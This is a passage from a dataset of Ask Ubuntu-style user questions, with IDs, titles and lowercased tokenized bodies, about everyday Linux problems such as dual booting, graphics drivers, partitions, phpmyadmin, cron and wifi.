'' identifier `` aticonfig-device [ 1 ] -0 '' driver `` fglrx '' option `` monitor-dfp6 '' `` 1-dfp6 '' busid `` pci:2:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` aticonfig-screen [ 1 ] -0 '' device `` aticonfig-device [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection i ran xrandr to see if that could help and it gave me some strange results : screen 0 : minimum 320 x 200 , current 2560 x 1440 , maximum 2560 x 2560 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 disconnected ( normal left inverted right x axis y axis ) dfp5 disconnected ( normal left inverted right x axis y axis ) dfp6 connected primary 2560x1440+0+0 ( normal left inverted right x axis y axis ) 597mm x 336mm 2560x1440 60.0*+ 1800x1440 60.0 1856x1392 60.0 1792x1344 60.0 1920x1200 60.0 1920x1080 60.0 1600x1200 60.0 1680x1050 60.0 1400x1050 60.0 1600x900 60.0 1360x1024 60.0 1280x1024 60.0 1440x900 60.0 1280x960 60.0 1280x768 60.0 1280x720 60.0 1024x768 60.0 800x600 60.0 640x480 60.0 dfp7 disconnected ( normal left inverted right x axis y axis ) crt1 disconnected ( normal left inverted right x axis y axis ) as far as i can tell from the xorg.conf dfp7 is the other non-working display . thanks for your help , n
375881	partitions appear larger than supposed to be	i 've resized my c : // ( windows7 ) partition by 41gb , hence made it smaller and merged the extra space with the other data partition i had . now ubuntu is 'seeing ' both partitions as larger when compared to how they are supposed to be . the picture ( link below ) shows the comparison between windows & ubuntu , showing fdisk output as well . seagate & sdb is the other hard drive - it 's unrelated . windows & ubuntu partitions , and fdisk output anyone knows what 's happening ? and what should i do to make things as they are supposed to be ? side-note : boot-repair and grub2 are also detecting 2 windows7 os 's whilst i always had just one ( and i never re-installed windows or something of the sort ) . dunno whether it 's related . thanks in advance for your help !
375882	sound control in lubuntu	when i turn the light up and down om my laptop or any other laptop , a sort of an indicator pops up . this does n't happen with the sound in lubuntu . why is that ? it works fine with ubuntu and xubuntu .
375883	what happened to my browsers and rabbitvcs	i am facing a strange problem . i am using rabbitvcs . after changing a file i try to reload my browsers to see the effect but it shows the same thing and when i see view source it shows my old code that i may change or have written something new , but it is not loaded on browser . totally in a fix where the problem resides . how can i get rid of this problem ? i am using ubuntu 13.10 thanks in advance .
375885	ca n't find ubuntu one folder on my android device	i 've installed and logged in ubuntu one on my huawei u9508 android smartphone expected to see /mnt/sdcard/u1 folder , but it simply does n't exist . also checked /mnt/sdcard2 which is built in flash drive - there was n't too . where is it ? how can i find it ?
375888	problem installing ros on ubunut 12.04	this is my first time trying to install ros electric on my ubuntu precise 12.04 . but whenever i 'm trying to start the installation , i keep getting stuck because they can not find the packages ? why it is happened and how to solve it ? thank you for any help .
375892	extract numerical value from string	i want to extract the numerical value out of the below command output : bash-3.2 # psrinfo -pv | head -1 the physical processor has 1 virtual processor ( 0 ) that is , the output should be `` 1 '' . can someone provide me any commands or a small script to do that ?
375895	need help with old data and ubuntu installation to replace windows entirely	i have windows desktop which i am using from a very long time . i have been a regular windows user since i have stepped in the computer world . i have a plan to install ubuntu on my desktop and want to remove the the windows installation entirely . what i mean by this is i want to replace the whole windows 7 os with the latest version of ubuntu . i have never used linux before in my life at all but have started developing an interest in it . my exact question is if in case i happen to install ubuntu on my c : drive will i be able to access all my data on all the other drives as the data available on all other drives is extremely important for me and i can not afford to loose it on any circumstances . if not , then what are the steps to accomplish the same and an information if it is critical . on the other hand i can not backup the entire data as it happens to be about 1 tb . any help in this case is welcomed and appreciated .
375899	how do i run rdesktop in a new x session ?	i use ctrl-alt-f1 through ctrl-alt-f6 for cli and ctrl-alt-f7 for the xsession . i would like to run rdesktop in fullscreen ctrl-alt-f8 so that i can switch between them . is there a way to either run another xdm/xsession on ctrl-alt-f8 and form within it run rdesktop or otherwise have rdesktop display directly to ctrl-alt-f8 ?
375901	customizing unity for custom live cd	so now i know how i can create my custom live cd ( using ubuntu customization kit ) , i have added teamviewer and virtualbox to my custom image and i was even able remove the `` try ubuntu '' dialog by removing ubiquity . however i seem to be unable to figure out how i can customize unity itself , i want to : disable automatic login , alternativly automatic login for a different user than `` ubuntu '' ( i have already added one ) customize unity launcher by adding / replacing icons ( for example replacing the libreoffice icons with virtualbox , teamviewer , terminal , etc . ) is there any way to do this kind of stuff directly from the console ? ( customization console of uck ? ) i am customizing ubuntu 13.10 .
375907	how to run .profile from .bashrc file ?	i have a file name .test with a echo statement . now i want to run this file from .bashrc file . what i have done so far is : my .test file contains : echo `` hello everyone '' my .bashrc file contains : echo `` hello world '' now what i want is to run .test file from .bashrc file and here is what i did in .bashrc file echo `` hello world '' env= $ ( /home/narwen/.test ) echo $ env now when i try to run the .bashrc file from prompt like this . .bashrc i get hello world and errors like this xauthority=/home/niraj/.xauthority _=/usr/bin/env = can somebody help me please ?
375910	how do i make ubuntu touch skip mintro or rotate screen on nexus 7	ok i know this is a long shot but here it goes . i picked up a nexus 7 tablet with a cracked screen .most of the screen is usable to touch i 'd say about 60 percent . with android it was no big deal , rotate the tablet and access the other parts of a menu.. so i figure why not try the new ubuntu touch so i flashed it onto the nexus . now here is where i am stuck . i can not rotate the screen and since the intro wants you to touch all four sides i cant do anything with it , if i could `` skip the intro '' i would but it ios in the area that i cant access . so my question is is there any way to make the screen rotate ? or skip the intro ? i understand its a long shot , but worth a try .
375914	error while upgrading from 11.10 to 12.04	i am trying to upgrade from ubunto 11.10 to 12.04 , but every time it shows network or server error . pl help !
375915	file permissions usb hard drive ubuntu 12.04	sorry if this has been asked before , i searched and searched , but could n't get to the bottom of this . i have a pc running ubuntu 12.04 , which i 'm using as a media centre . the internal drive has only 84gb so i have added an external 2tb usb drive . it is formatted as ntfs and i have mounted it at /home so that all the users ' home directories end up on the external drive and can be filled with movies , music etc without impinging on the tiny internal drive however i have just realised that every file on the drive has onwer : group root : root and permissions 777 . if i try to chown or chmod the files it appears to work , but nothing changes . my line from fstab is uuid=1ebc02cfbc02a0ff /home ntfs defaults 0 2 any suggestions to how my users can get correct permiissions on their files ? phil
375919	how to disable notifications	i am using ubuntu 12.04 with gnome-fallback-session . the notifications that come up all the time are very annoying . they even come when a song is changed . i could n't find the place to disable it . in which way i can do this ?
375921	ubuntu 13.10 freezes/crashes when suspended/hibernating	hardware : gateway fx 7805u os : ubuntu 13.10 64bit i recently installed ubuntu 13.10 on my laptop and am having an issue where the os will lockup and freeze when entering suspend/hibernation . the screen is black and nothing will bring it out of suspension , ie mouse , keyboard , etc . only way i 've found to bring it out is to do a hard shutdown and reboot . i have seen where this is a known bug , but was wondering if there is a definitive fix or workaround for this issue . i did a search here and on google but founding nothing solid so i wanted to ask to see if there was a known and up to date way to resolve this issue . i 'm not too familiar with linux , but i am willing to do the work to get this fixed . i have been nothing but satisfied with the os and plan to stay with it for quite some time . any and all help would be greatly appreciated . if there is any other info that would be needed to have a better idea on a solution to this problem , i 'll be more than happy to provide it . thank you .
375923	juju gui network interface	when i 've installed juju-gui service i need to see it 's public address . when i type : juju status system gives me the following output : environment : local machines : `` 0 '' : agent-state : started agent-version : 1.16.3.1 dns-name : 10.0.3.1 instance-id : localhost series : precise `` 1 '' : agent-state : started agent-version : 1.16.3.1 instance-id : server-local-machine-1 instance-state : missing series : precise services : juju-gui : charm : cs : precise/juju-gui-79 exposed : true units : juju-gui/0 : agent-state : pending agent-version : 1.16.3.1 machine : `` 1 '' public-address : 10.0.3.214 and i see that my public address is 10.0.3.214 , but my subnet is 10.0.1. and my local address is 10.0.1.49 i also noticed that after installing juju , system added my strange network interface called : lxcbr0 how can i change public address of service ?
375925	ubuntu 12.04 lts not installed even after perfect installation	so , i am installing ubuntu 12.04 lts and the setup completes perfectly but it hangs when the installation is complete . ( the step when we have to reboot ) and i just simply plug out from mains after that , i see no trace of ubuntu except hdd , i find some files on the hdd ( dev/sda5 ) also , i have installed the ubuntu grub on dev/sda7 while installation so that i could format it later , if i do n't want to use ubuntu . please help as i have done the installation about 3 times ! also , i sue unetbnootin as i do n't have cd drive
375935	how do i install amd drivers without breaking my system ?	i 'm using a dell inspiron 15 with a hybrid amd radeon 7730m along with an intel 4000 hd . previous attempts at installing have resulted in a black screen on boot . how can i install these drivers to allow me to play games ? the methods i have tried are this and this .
375936	how to add ubuntu to the windows 8 boot menu with a gpt harddrive	i would like to know how to add ubuntu to the windows 8 boot menu using bcdedit . i have uefi with secure boot enabled and both os 's can be booted from the uefi boot menu by pressing f9 . i also have gpt hard-drive partitioning . please do not suggest adding windows to grub as i have already done this , windows every now and again whilst updating will change the default boot manager back to the windows one . i know there is a work around to stop windows from doing this but i 'm not interested in that as it is a messy hack . also dont't suggest easybcd or visual bcd because these programs do not work with gpt yet ( as far as i 'm aware ) . so the only route i think i can take is to manually enter the information into the bcd store ( which is now in the unmapped efi partition ) using bcdedit but i 'm not sure how to do this . i did get this working once before by copying the windows boot manager entry and editing it for ubuntu , but when i tried to do that again it didn'twork so i must be missing something .
375938	can not update ubuntu 12.04 lts .	when i am running update , i can not update due to this error ; /*w : gpg error : http : //deb.playonlinux.com squeeze release : the following signatures could n't be verified because the public key is not available : no_pubkey e0f72778c4676186 , w : failed to fetch http : //ppa.launchpad.net/artfwo/ppa/ubuntu/dists/precise/main/source/sources : 404 not found how can i solve this ?
375943	get the access to the folder file system/root	i am using a live version of xubuntu on usb for a extraordinary maintenance of my pc . i have to copy a single file inside the folder file system/root . currently i can browse the complete folder file system , but the root folder in it is marked with a cross and it prompts permission denied while trying to open it or if i try to copy file inside it .
375947	dual boot - xp and ubuntu on two hdd	pardon question redundancy . i read similar , but unanswered questions involving what i 'd like to do . i have an ancient dell desktop running xp to which i 've added a second hard drive . both drives are only 40gb each , so there is little room to crowd two os on one drive . i had been using the second drive for backup/storage , but i 'd like to put ubuntu on it and have dual boot available . i have pangolin iso on cd . my bios boot sequence options show cd-rom , but not my dvd drive ( added later - not factory ) and pp is the latest distro that fits on a cd . my proposal : reformat and wipe the second drive . set blank drive to boot first in bios . ubuntu should show no os and i can safely let it install grub and os on the second drive automatically without worry of ruining xp or partitioning incorrectly . let ubuntu drive remain first to boot and grub will give boot option . any glaring holes in this plot ? i am a noob and worried about screwing up partitioning . i was hoping this would be the simplest method , but my ignorance may be showing here . i do n't care about default boot order . specific questions : will i be able to share data between the two os with this method ? not critical , but i 'd like to be able to at least copy stored data back and forth between them . after running the live session of ubuntu to rescue data from a vista corruption crash on my laptop , i 've seen my win hdd mounted in ubuntu , but will xp see my ubuntu drive and let me access it ? i 've only recently started playing with linux distros , but i am amazed by what can be done . i 've run damn small linux and then absolute linux on a castoff office workstation that previously ran win98 and it is like reviving the dead . most impressive . edit_____________________________________________ okay . when i go to install , i have only two options from ubuntu . replace xp and install 12.04 , or `` something different '' . since i want to keep xp on sda , i must format the partitions on sdb myself . this is where i 'm like a kid on a high dive who 's hesitant to jump . i 've read a lot of different things , but most involve partitioning for both os on the same drive . i want to leave sda alone ( except for grub install ) and partition sdb for ubuntu . i have 40gb hd and 750mb of ram . i know that i need a swap area , a root partition , and then a space for ubuntu files . i 'd like to be able to share files between os if possible . do i need to make some changes to the sda partition to do that ? this is what i think i need to do to sdb . please let me know if you see anything that i should change . primary - 1000 mb - beginning - swap primary - 10,000 mb - beginning - ext4 - / primary - 28,700 mb - beginning - ext4 - /home the last part is the remainder of free space after the first two . drive reads 39,700 mb actual size . from what i read , swap should roughly equal ram and something i read led me to believe that 10gb would be a good size for root . sorry for the spoon-feeding request , but any advice is greatly appreciated .
375948	how to disable powerbutton in 13.10 minimal ?	i have my ir receiver connected to the physical power button for turning on and there 's a separate remote button for turning off . how to disable the power on button from shutting down the computer ? in previous ubuntu versions i have edited /etc/acpi/powerbtn.sh but now it has now effect . my /etc/acpi/powerbtn.sh and /etc/acpi/events/powerbutton both are symlinked to /bin/false and still the power button works .
375949	phpmyadmin just will not work fully	right , i 've spent upwards of 8 hours on this and i just ca n't solve it ! firstly , i could n't log in to phpmyadmin with every combination of possible default password and usernames until i had to go into config.inc.php and change a setting ( i think autopassword ? ) to `` false '' . then i logged in and nothing worked properly , so i had to import a file , so i did and it kind of worked , but when i went to access my tables after it gave an error and refused to work . so i tried reinstalling phpmyadmin in various ways , but now i ca n't log in at all , no combination of username and password or no password will work ! i 've tried that many different things i ca n't even remember what did what now , and i 'm pretty sure i need to remove the entire thing and start fresh but it does n't seem to work since when it creates the login in the new install , the details i entered ( or ven did n't enter ) do not work . can anyone please point me in the right direction ? ( also , no matter what order of things i do the settings prompt will always give me an error , various different kinds . ) edit : when i get close to what might seem like a solution i will always get this message : sambo @ sambo-to-be-filled-by-o-e-m : ~ $ sudo mysqld -- skip-grant-tables & [ 2 ] 10387 sambo @ sambo-to-be-filled-by-o-e-m : ~ $ 131112 17:25:57 [ warning ] using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release . please use the full name instead .
375951	ca n't download anything due to proxy	i 'm using 13.04 for the first time and i am using proxy base server that 's why i ca n't download anything while i use apt-get update then it shows this message coolmonter @ coolmonter-hp-probook-4431s : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? any suggestion
375954	installing `` heroes of the storm ''	i went to the blizzcon .. great time and i saw their new game hero of the storm - http : //www.heroesofthestorm.com/en-us but i am using ubuntu 12.04 and when i try to install it , it does not work , nothing happens ... no launcher ... no screens ... nothing . i already have diablo 3 and wow installed ... so yes i have wine installed .
375957	dual partion windows not working ?	i originally set up ubuntu `` along side '' widows ( vista ) and realized it was done though wubi after i tried to set up a vb and did n't have enough room . i then repartitioned the hd and did a stand alone ubuntu install . the problem is when i try to boot windows it starts to load then does a flash and heads back to the start up boot page with ubuntu and windows on the boot screen . ubuntu loads fine , everytime but windows goes back . here is the boot script info . http : //paste.ubuntu.com/6405545/ any help would be appreciated . i want to leave windows behind but still need it for some things on this machine .
375959	can ubuntu 13.10 automatically connect to a wired connection that is a local.domain ?	simple question that i am having trouble to connect my new laptop to a wired and wireless connection . do you know if ubuntu needs a change in system settings somewhere to allow a connection without a wifi drop out or an automatic connection ?
375960	can i install ubuntu in an android pc ?	i have airis kira n7000 android device with the following specifications : ⠀• tft 7 panoramic display ( 800x480 ) ⠀• imapx210 arm11 1 ghz processor ⠀• 256 mb ddr2 and 2gb storage memory ⠀• 720p compatible integrated graphics ⠀• 3 usb and card reader sd / sd-hc ⠀• 802.11bg wifi network and network 10/100 mb ( rj-45 ) ⠀• speakers , microphone and in / out audio ⠀• lithium-ion battery for about 3 hours autonomy ⠀• android 2.1 with updates and applications ⠀• dimensions 225 x 151 x 29 mm . weight 0.66 kg can i install ubuntu 12.04 in this pc ?
375963	suspend working but then wakes up	well , it 's kind of working , just for a second , though . my computer goes to sleep . then , just after a second , it 's wakes up on its own . i do n't have any usb device plugged-in . any solution ?
375964	using ubuntu as network file and application server for a windows network ?	i am tasked with setting up a primarily windows based network for a construction firm . they require autocad data , standard microsoft office and peachtree files to be shared across the network . i am now in the process of installing the server and i can not install the grub boot loader to the hard disk . looks like the grub installer failed to recognize the drive . 1 ) i would appreciate any pointers in installing grub . 2 ) whats a good file server for seem less windows integration like active dirctory ?
375969	minimum packages required to send email	i have a fresh install of ubuntu 12.04 and have configured logrotation on it . now , i need to know which package i need to install so that it is able to email me the logs . will just installing postfix will work or will i have to install mailutils or sendmail . thanks . p.s . as it is a fresh install i do n't want to install un necessary packages .
375970	ca n't open windows 8 after installing ubuntu 12.04	yesterday , i tried ubuntu 12.04 lts and i liked it , so i installed it in my computer with windows 8 . i managed to create a disk partition in windows and i named it u : \ubuntu . then i installed ubuntu inside this partition , but now , when i try to enter in my windows 8 , it gives me an error message : error : secure boot forbids loading module from ( hd0 , gpt5 ) /boot/grub/ntfs.mod . error : no such device : 2402319002316706 error : unknow command 'drivemap ' . error : invalid efi file path . press any key to continue ... what can i do ? please i need urgent help , i need to access to windows 8 and i do n't want to lose any data ... i checked for the windows disk and i can se there 's all my information there , so , i did n't lose anything . thanks . i 'm sorry i 'm responding my own answer , but i need to solve this and i do n't know how to alert someone , so i 'm trying to reply my own answer . this is what i wrote in my last comment of the response that avinash raj gave me : hi ! i did it but the problem was n't solved . instead i 've got more options in the boot menu , here 's a photo : gyazo.com/1ba420cb16995132b530a1c75c30f598 . i also discovered how to enter windows : i changed the boot order to windows at first , so my pc loads my windows instead of ubuntu , but what i want is a dual-boot selector like this : pureinfotech.com/wp-content/uploads/2011/09/âś but with the two options ( windows 8 and ubuntu ) . is that possible ? thanks . can you help me ? thanks !
375972	unity and mouse cursor problems 13.10	after install gnome 3.10 in ubuntu 13.10 mouse cursor is hidden . only in unity , kde gnome enlightenment is ok. its also disabled on lightdm but in gdm is ok. my hardware is asus vivobook s200e . thanx
375975	how to force unity reload ~/.local/share/applications/	let 's say i changed/added some myapp.desktop file at ~/.local/share/applications/ . for some time ubuntu unity will still show me old applications shortcuts at unity lens under ubuntu button . it will take some time ( or just a one restart ) to get applications list updated there . how i can force unity reload ~/.local/share/applications and reflect shortcuts correctly in lens ?
375977	backup dedicated server runing ubuntu 10.04 and plesk 11.01 prior to update os to uduntu 12.04	i would like to backup my dedicated server which is my web server hosting various sites and email , so that i can update the os to ubuntu 12.04 , and basically restore back to 10.04 if things go wrong . i have a local machine that i can install 12.04 onto an then i was going to rsinc between the two , but i am fairly clueless when it comes to linux . i can ssh into the remote server and gain root access . can anyone explain if i need to backup the whole server hard drive or just some of the files ? thanks timmo .
375978	x11 development libraries	i am new to ubuntu , i am using ubuntu 13.10 , and trying to install ns-2 . during the installation i am facing the following error ; x11/xlib.h : no such file or directory then i tried to install sudo apt-get install libx11-dev this time i am facing the following error ; reading package lists ... done building dependency tree reading state information ... done package libx11-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libx11-dev ' has no installation candidate i have no idea how to deal it , please help thanks in advance
375980	cronjob for specific hours	i need a cronjob with criteria to power on/off a tv on the basis : mon-fri , power on the screen at 07.00 and power off the screen 17.00 . friday after 17.00 to monday morning to be powered off . i 'm using xset to force dpms on/off . display=:0 xset dpms force off ( powers off the tv ) display=:0 xset dpms force on & & display=:0 xset s reset ( powers on the tv ) xset : /usr/bin/xset
375982	gnome extensions do n't work ! i 've tried everything !	when i go to https : //extensions.gnome.org/ , and try to install an extension , it clicks on , but nothing happens to my shell . then , when i reload the page , the slider has turned off . here are the things i have tried : i tried chrome , firefox , and opera adding http : //extensions.gnome.org to my allow plugin list in google chrome and made sure gnome-intigration is enabled i made a new firefox profile and tried installing it i reset my gnome shell settings ( how do i reset gnome to the defaults ? ) - this link actually broke my system , as now i ca n't log in to any desktop environment , the only way i can get to unity , is by logging in to another desktop environment like cinnimon ( which does n't work ) , then immediately logging into unity . whenever i try to just log into unity or pretty much any other desktop environment , it logs in , but then seems to crash , and log out . sometimes i even get quick glances of the unity bar before it crashes i tried-re installing gnome none of these methods worked ! ! thank you in advance ! ! edit : gnome shell 3.4.1 ubuntu 12.04 chrome version : 30.0.1599.114
375986	how to change metamode in xorg.conf so that my game in fhd will be displayed only in the external monitor ?	i would like to launch my game only in the external monitor which i have attached to my laptop with hdmi cable . this is my current xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 319.60 ( buildmeister @ swio-display-x64-rhel04-15 ) wed sep 25 15:17:31 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` metamodes '' `` 1024x786 , null ; 1280x720 , null ; null,1680x1050 ; null,1920x1080 '' subsection `` display '' depth 24 endsubsection endsection although with this config nothing changes ( i have my game displayed in the laptop screen and exceeding a little bit onto the external monitor since i set it to be in 1920x1080 ) i have read this https : //help.ubuntu.com/community/xineramahowto but with no luck of solving this issue . the only temporary solution for this problem now is to manually switch of the laptop display and then launch the game . edit now i have tried something like this but still it show in the laptop display and extends till external monitor ) section `` screen '' # removed option `` metamodes '' `` 1024x786 , null ; 1280x720 , null ; 1680x1050 , null ; null,1920x1080 '' # removed option `` nvidiaxineramainfoorder '' `` dfp-0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+483 , dfp-1 : nvidia-auto-select +1366+0 ; dfp-0 : null +0+483 , dfp-1 : 1920x1080 , +1366+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-0 : null +0+0 , dfp-1 : 1920x1080 +1366+0 '' subsection `` display '' depth 24 endsubsection endsection edit and this would turn off the laptop screen , awkwardly scale the external screen , turn on the sound from the game but no video output ( only desktop ) option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+483 , dfp-1 : nvidia-auto-select +1366+0 ; dfp-0 : null , dfp-1 : 1920x1080 , +1366+0 ''
375989	wifi connection problem -ubuntu 13.10	i am an entry level user of ubuntu . i recently upgraded my toshiba a300 satellite to ubuntu 13.10 ( from 13.04 ) . everything was fine until it went to sleep mode . i did a force shutdown since it was not waking up . after that i am not able to connect to my wifi network . please help . thanks in advance .
375993	ca n't install dual boot from usb live - crash and nouvea problem	i just got a new laptop with windows 8 pre-installed and i 'm trying to make a dual boot with ubuntu on my other hard drive but i ca n't make the live usb work . i followed all the procedure for disabling the security boot and the uefi setting but still does n't work . it seems to start the installing procedure but i never get to choose anything : after a few seconds the screen turns black with an error message ; [ 18.707838 ] divide error : 0000 [ # 1 ] smp it goes on for several lines quoting some nouveau problem . any ideas ?
375994	wireless lan soft blocked on ubuntu 13.10	i 've troubles with bluetooth and with lan . when i digit : rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : yes hard blocked : no when i digit : lspci -v 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root complex subsystem : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root complex flags : bus master , 66mhz , medium devsel , latency 0 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] trinity [ radeon hd 7600g ] ( prog-if 00 [ vga controller ] ) subsystem : advanced micro devices , inc. [ amd/ati ] trinity [ radeon hd 7600g ] flags : bus master , fast devsel , latency 0 , irq 48 memory at c0000000 ( 32-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=256 ] memory at feb00000 ( 32-bit , non-prefetchable ) [ size=256k ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : radeon 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller subsystem : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller flags : bus master , fast devsel , latency 0 , irq 49 memory at feb44000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:10.0 usb controller : advanced micro devices , inc. [ amd ] fch usb xhci controller ( rev 03 ) ( prog-if 30 [ xhci ] ) subsystem : advanced micro devices , inc. [ amd ] fch usb xhci controller flags : bus master , fast devsel , latency 0 , irq 18 memory at feb48000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:11.0 sata controller : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] ( rev 40 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : advanced micro devices , inc. [ amd ] device 7800 flags : bus master , 66mhz , medium devsel , latency 32 , irq 45 i/o ports at f190 [ size=8 ] i/o ports at f180 [ size=4 ] i/o ports at f170 [ size=8 ] i/o ports at f160 [ size=4 ] i/o ports at f150 [ size=16 ] memory at feb50000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:12.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) ( prog-if 10 [ ohci ] ) subsystem : advanced micro devices , inc. [ amd ] fch usb ohci controller flags : bus master , 66mhz , medium devsel , latency 32 , irq 18 memory at feb4f000 ( 32-bit , non-prefetchable ) [ size=4k ] kernel driver in use : ohci-pci 00:12.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) ( prog-if 20 [ ehci ] ) subsystem : advanced micro devices , inc. [ amd ] fch usb ehci controller flags : bus master , 66mhz , medium devsel , latency 32 , irq 17 memory at feb4e000 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : ehci-pci 00:13.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) ( prog-if 10 [ ohci ] ) subsystem : advanced micro devices , inc. [ amd ] fch usb ohci controller flags : bus master , 66mhz , medium devsel , latency 32 , irq 18 memory at feb4d000 ( 32-bit , non-prefetchable ) [ size=4k ] kernel driver in use : ohci-pci 00:13.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) ( prog-if 20 [ ehci ] ) subsystem : advanced micro devices , inc. [ amd ] fch usb ehci controller flags : bus master , 66mhz , medium devsel , latency 32 , irq 17 memory at feb4c000 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : ehci-pci 00:14.0 smbus : advanced micro devices , inc. [ amd ] fch smbus controller ( rev 14 ) subsystem : advanced micro devices , inc. [ amd ] fch smbus controller flags : 66mhz , medium devsel kernel driver in use : piix4_smbus 00:14.1 ide interface : advanced micro devices , inc. [ amd ] fch ide controller ( prog-if 8a [ master secp prip ] ) subsystem : advanced micro devices , inc. [ amd ] fch ide controller flags : bus master , 66mhz , medium devsel , latency 32 , irq 17 i/o ports at 01f0 [ size=8 ] i/o ports at 03f4 [ size=1 ] i/o ports at 0170 [ size=8 ] i/o ports at 0374 [ size=1 ] i/o ports at f100 [ size=16 ] kernel driver in use : pata_atiixp 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) subsystem : advanced micro devices , inc. [ amd ] fch azalia controller flags : bus master , slow devsel , latency 32 , irq 16 memory at feb40000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 ) subsystem : advanced micro devices , inc. [ amd ] fch lpc bridge flags : bus master , 66mhz , medium devsel , latency 0 00:14.4 pci bridge : advanced micro devices , inc. [ amd ] fch pci bridge ( rev 40 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , 66mhz , medium devsel , latency 64 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=64 00:14.5 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) ( prog-if 10 [ ohci ] ) subsystem : advanced micro devices , inc. [ amd ] fch usb ohci controller flags : bus master , 66mhz , medium devsel , latency 32 , irq 18 memory at feb4b000 ( 32-bit , non-prefetchable ) [ size=4k ] kernel driver in use : ohci-pci 00:14.7 sd host controller : advanced micro devices , inc. [ amd ] fch sd flash controller ( prog-if 01 ) subsystem : advanced micro devices , inc. [ amd ] fch sd flash controller flags : bus master , 66mhz , medium devsel , latency 39 , irq 16 memory at feb4a000 ( 64-bit , non-prefetchable ) [ size=256 ] kernel driver in use : sdhci-pci 00:15.0 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 0 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000e000-0000efff prefetchable memory behind bridge : 00000000d0000000-00000000d00fffff capabilities : < access denied > kernel driver in use : pcieport 00:15.1 pci bridge : advanced micro devices , inc. [ amd ] hudson pci to pci bridge ( pcie port 1 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : fe900000-feafffff capabilities : < access denied > kernel driver in use : pcieport 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 0 flags : fast devsel 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 1 flags : fast devsel 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 2 flags : fast devsel 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 3 flags : fast devsel capabilities : < access denied > kernel driver in use : k10temp 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 4 flags : fast devsel 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) 